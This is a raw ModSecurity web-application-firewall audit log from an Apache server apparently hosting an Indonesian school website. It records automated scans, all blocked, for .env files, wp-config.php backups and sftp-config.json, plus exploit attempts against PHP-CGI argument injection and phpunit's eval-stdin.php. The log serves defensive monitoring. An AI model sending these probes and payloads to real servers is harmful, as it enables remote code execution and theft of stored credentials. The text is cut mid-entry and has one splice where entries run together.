aAGbaTlhhbF_BYhFYTXhIQAAAEo 103.236.140.4 52468 103.236.140.4 8181 --02873e21-B-- GET /wordpress/wp-config.php.new HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36 Accept: */* --02873e21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02873e21-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935785528537 683 (- - -) Stopwatch2: 1744935785528537 683; combined=263, p1=235, p2=0, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02873e21-Z-- --f89c302e-A-- [18/Apr/2025:07:23:08 +0700] aAGbbDpR4B6O-aqWibPQVAAAAI8 103.236.140.4 52500 103.236.140.4 8181 --f89c302e-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.212.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.212.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.91 Safari/537.36 Accept: */* --f89c302e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f89c302e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744935788559030 694 (- - -) Stopwatch2: 1744935788559030 694; combined=284, p1=256, p2=0, p3=0, p4=0, p5=28, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f89c302e-Z-- --d7fed778-A-- [18/Apr/2025:10:18:39 +0700] aAHEjxk6uTiIdxrJEEQINAAAAM4 103.236.140.4 38978 103.236.140.4 8181 --d7fed778-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --d7fed778-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7fed778-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744946319213653 968 (- - -) Stopwatch2: 1744946319213653 968; combined=466, p1=354, p2=0, p3=0, p4=0, p5=112, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7fed778-Z-- --5117ef22-A-- [18/Apr/2025:10:33:28 +0700] aAHICBk6uTiIdxrJEEQI4wAAAMk 103.236.140.4 42388 103.236.140.4 8181 --5117ef22-B-- GET /wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 108.167.133.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 108.167.133.25 X-Forwarded-Proto: http Connection: close Accept: */* --5117ef22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5117ef22-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744947208446148 1706 (- - -) Stopwatch2: 1744947208446148 1706; combined=457, p1=414, p2=0, p3=0, p4=0, p5=43, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5117ef22-Z-- --b2924527-A-- [18/Apr/2025:10:39:10 +0700] aAHJXjlhhbF_BYhFYTUwHAAAAEg 103.236.140.4 43682 103.236.140.4 8181 --b2924527-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --b2924527-C-- --b2924527-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2924527-E-- --b2924527-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744947550638901 5544 (- - -) Stopwatch2: 1744947550638901 5544; combined=3981, p1=587, p2=3358, p3=0, p4=0, p5=36, sr=114, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2924527-Z-- --ee781d21-A-- [18/Apr/2025:11:05:04 +0700] aAHPcDpR4B6O-aqWibMe0AAAAIY 103.236.140.4 49446 103.236.140.4 8181 --ee781d21-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.2.147.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.2.147.153 X-Forwarded-Proto: https Connection: close Content-Length: 27 User-Agent: python-requests/2.31.0 Accept: */* Content-Type: application/x-www-form-urlencoded --ee781d21-C-- --ee781d21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee781d21-E-- --ee781d21-H-- Message: Access denied with code 403 (phase 2). String match " allall --b1dcde74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1dcde74-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744949201499083 4112 (- - -) Stopwatch2: 1744949201499083 4112; combined=2405, p1=458, p2=1919, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1dcde74-Z-- --fb16dc6c-A-- [18/Apr/2025:11:27:31 +0700] aAHUsxk6uTiIdxrJEEQK3wAAANY 103.236.140.4 55072 103.236.140.4 8181 --fb16dc6c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.101 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3844.0 Safari/537.36 Accept-Charset: utf-8 --fb16dc6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb16dc6c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744950451677785 813 (- - -) Stopwatch2: 1744950451677785 813; combined=359, p1=318, p2=0, p3=0, p4=0, p5=40, sr=113, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb16dc6c-Z-- --ec9d3b6c-A-- [18/Apr/2025:12:24:32 +0700] aAHiEFyj-eUTITfvHEWBmgAAABU 103.236.140.4 39600 103.236.140.4 8181 --ec9d3b6c-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 159.89.127.165 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 159.89.127.165 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --ec9d3b6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec9d3b6c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744953872233204 901 (- - -) Stopwatch2: 1744953872233204 901; combined=335, p1=297, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec9d3b6c-Z-- --374dc27e-A-- [18/Apr/2025:13:13:52 +0700] aAHtoBk6uTiIdxrJEEQQsAAAAMA 103.236.140.4 55806 103.236.140.4 8181 --374dc27e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 209.38.95.9 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 209.38.95.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --374dc27e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --374dc27e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744956832213545 742 (- - -) Stopwatch2: 1744956832213545 742; combined=309, p1=272, p2=0, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --374dc27e-Z-- --da83116b-A-- [18/Apr/2025:13:50:24 +0700] aAH2MDlhhbF_BYhFYTVCrQAAAFQ 103.236.140.4 45590 103.236.140.4 8181 --da83116b-B-- GET /wp-config.php.bk HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 89.43.31.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 89.43.31.214 X-Forwarded-Proto: http Connection: close Accept: */* --da83116b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da83116b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744959024637982 828 (- - -) Stopwatch2: 1744959024637982 828; combined=320, p1=277, p2=0, p3=0, p4=0, p5=43, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da83116b-Z-- --f57c8f31-A-- [18/Apr/2025:14:06:11 +0700] aAH54xk6uTiIdxrJEEQXcwAAAMM 103.236.140.4 59584 103.236.140.4 8181 --f57c8f31-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --f57c8f31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f57c8f31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744959971063260 793 (- - -) Stopwatch2: 1744959971063260 793; combined=295, p1=262, p2=0, p3=0, p4=0, p5=33, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f57c8f31-Z-- --69107773-A-- [18/Apr/2025:14:06:11 +0700] aAH54xk6uTiIdxrJEEQXdAAAAMs 103.236.140.4 59586 103.236.140.4 8181 --69107773-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --69107773-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69107773-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744959971305947 653 (- - -) Stopwatch2: 1744959971305947 653; combined=241, p1=212, p2=0, p3=0, p4=0, p5=29, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69107773-Z-- --0a439825-A-- [18/Apr/2025:14:06:11 +0700] aAH54xk6uTiIdxrJEEQXdwAAAMg 103.236.140.4 59596 103.236.140.4 8181 --0a439825-B-- GET /config/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --0a439825-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a439825-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744959971548558 823 (- - -) Stopwatch2: 1744959971548558 823; combined=313, p1=279, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a439825-Z-- --5771b80a-A-- [18/Apr/2025:14:06:11 +0700] aAH54xk6uTiIdxrJEEQXeQAAAME 103.236.140.4 59602 103.236.140.4 8181 --5771b80a-B-- GET /.env.production HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --5771b80a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5771b80a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744959971791388 808 (- - -) Stopwatch2: 1744959971791388 808; combined=302, p1=267, p2=0, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5771b80a-Z-- --2977765e-A-- [18/Apr/2025:14:06:26 +0700] aAH58lyj-eUTITfvHEWQGQAAABE 103.236.140.4 59802 103.236.140.4 8181 --2977765e-B-- GET /wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --2977765e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2977765e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744959986912496 837 (- - -) Stopwatch2: 1744959986912496 837; combined=338, p1=296, p2=0, p3=0, p4=0, p5=42, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2977765e-Z-- --904dd42e-A-- [18/Apr/2025:14:06:27 +0700] aAH58zlhhbF_BYhFYTVGIgAAAFY 103.236.140.4 59810 103.236.140.4 8181 --904dd42e-B-- GET /symfony/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --904dd42e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --904dd42e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744959987155477 758 (- - -) Stopwatch2: 1744959987155477 758; combined=293, p1=260, p2=0, p3=0, p4=0, p5=32, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --904dd42e-Z-- --a0a4c337-A-- [18/Apr/2025:14:06:27 +0700] aAH58zlhhbF_BYhFYTVGJAAAAEQ 103.236.140.4 59814 103.236.140.4 8181 --a0a4c337-B-- GET /django/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --a0a4c337-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0a4c337-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744959987398315 802 (- - -) Stopwatch2: 1744959987398315 802; combined=299, p1=262, p2=0, p3=0, p4=0, p5=36, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0a4c337-Z-- --3402f619-A-- [18/Apr/2025:14:06:27 +0700] aAH58zpR4B6O-aqWibMrbgAAAI4 103.236.140.4 59820 103.236.140.4 8181 --3402f619-B-- GET /flask/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --3402f619-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3402f619-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744959987641132 898 (- - -) Stopwatch2: 1744959987641132 898; combined=326, p1=287, p2=0, p3=0, p4=0, p5=39, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3402f619-Z-- --c9be5304-A-- [18/Apr/2025:14:06:27 +0700] aAH58zlhhbF_BYhFYTVGJgAAAEg 103.236.140.4 59822 103.236.140.4 8181 --c9be5304-B-- GET /next/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 